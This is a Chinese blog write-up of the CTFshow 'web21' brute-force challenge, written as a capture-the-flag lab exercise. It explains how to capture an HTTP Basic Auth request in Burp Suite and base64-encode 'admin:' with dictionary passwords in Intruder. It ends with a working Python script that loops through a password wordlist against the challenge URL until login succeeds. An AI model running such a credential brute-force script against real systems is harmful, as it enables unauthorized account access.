CTFshow 爆破 web21

根据提示

爆破什么的,都是基操

进去弹出表单,要求输入账号密码
在这里插入图片描述
通过bp抓包得到,发现Authorization 后面的是base64加密的字段
在这里插入图片描述
解密得到 用户名:密码
在这里插入图片描述
对admin:进行加密
在这里插入图片描述
用bp把请求数据包发送到Intruder模块,构造payload(第一个$前面的是admin:的base64加密)
在这里插入图片描述
加载题目给的字典(zip文件重命名1.zip,可以得到字典的txt文件),然后添加规则,将payload进行base64加密,并且把下方的url加密的勾去掉,开始爆破

在这里插入图片描述在这里插入图片描述
由于题库对请求速度做了限制,线程最高只能开到5,速度很慢,要耐心等待,找到长度不一样的,查看响应包,拿到flag
在这里插入图片描述
附上脚本

import requests
import time
import base64

url="http://5449841b-f207-4dfc-945f-45fa5dac968d.challenge.ctf.show/"

def bp(line):
    s=requests.session()

    header={
        'Authorization':'Basic YWRtaW46{}'.format(base64.b64encode(line.encode('utf-8')).decode('utf-8'))
    }

    res=s.get(url,headers=header)

    return res.text


with open("最新网站后台密码破解字典.txt") as q:
    passlist=q.readlines()
    q.close

for line in passlist:
    line=line.strip("\n")
    time.sleep(0.2)
    print(line)
    if "需要用户名和密码才能继续访问" not in bp(line):
        print("password is {}".format(line))
        break

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值